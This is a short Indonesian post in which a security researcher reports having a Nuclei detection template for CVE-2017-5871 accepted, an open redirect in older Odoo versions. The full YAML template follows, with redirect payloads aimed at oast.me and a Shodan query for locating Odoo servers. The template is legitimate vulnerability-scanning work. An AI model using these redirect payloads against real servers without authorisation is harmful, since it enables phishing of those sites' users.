01 Oktober 2024, saya menyumbangkan Template CVE-2017-5871 untuk ProjectDiscovery (Nuclei Templates). 02 Oktober 2024, Template CVE-2017-5871 sedang dalam proses peninjauan. 03 Oktober 2024, Template CVE-2017-5871 disetujui.
id: CVE-2017-5871
info:
name: Odoo <= 8.0-20160726 & 9.0 - Open Redirect
author: 1337rokudenashi
severity: medium
description: |
An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
impact: |
Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft.
remediation: |
Update Odoo to the latest patched version provided by the vendor.
reference:
- https://sysdream.com/cve-2017-5871-odoo-url-redirection-to/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5871
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-5871
cwe-id: CWE-601
cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Odoo"
product: odoo
vendor: odoo
tags: cve2017,cve,odoo,redirect
http:
- method: GET
path:
- "{{BaseURL}}/web/session/logout?redirect=https://oast.me"
- "{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f"
- "{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a00473045022020526a4a017f0ebf412281aa95a72bf7a4f658c9f0762e3d04f8e7777c27c3aa02210096b1d8f905d0add3542ab88bf2780fff501aecd56d8e99a7d7ddd25f44bcd9ae:922c64590222798bb761d5b6d8e72950Ini adalah bentuk kontribusi saya sebagai Security Researcher. Odoo <= 8.0-20160726 & 9.0 - Open Redirect (1337rokudenashi)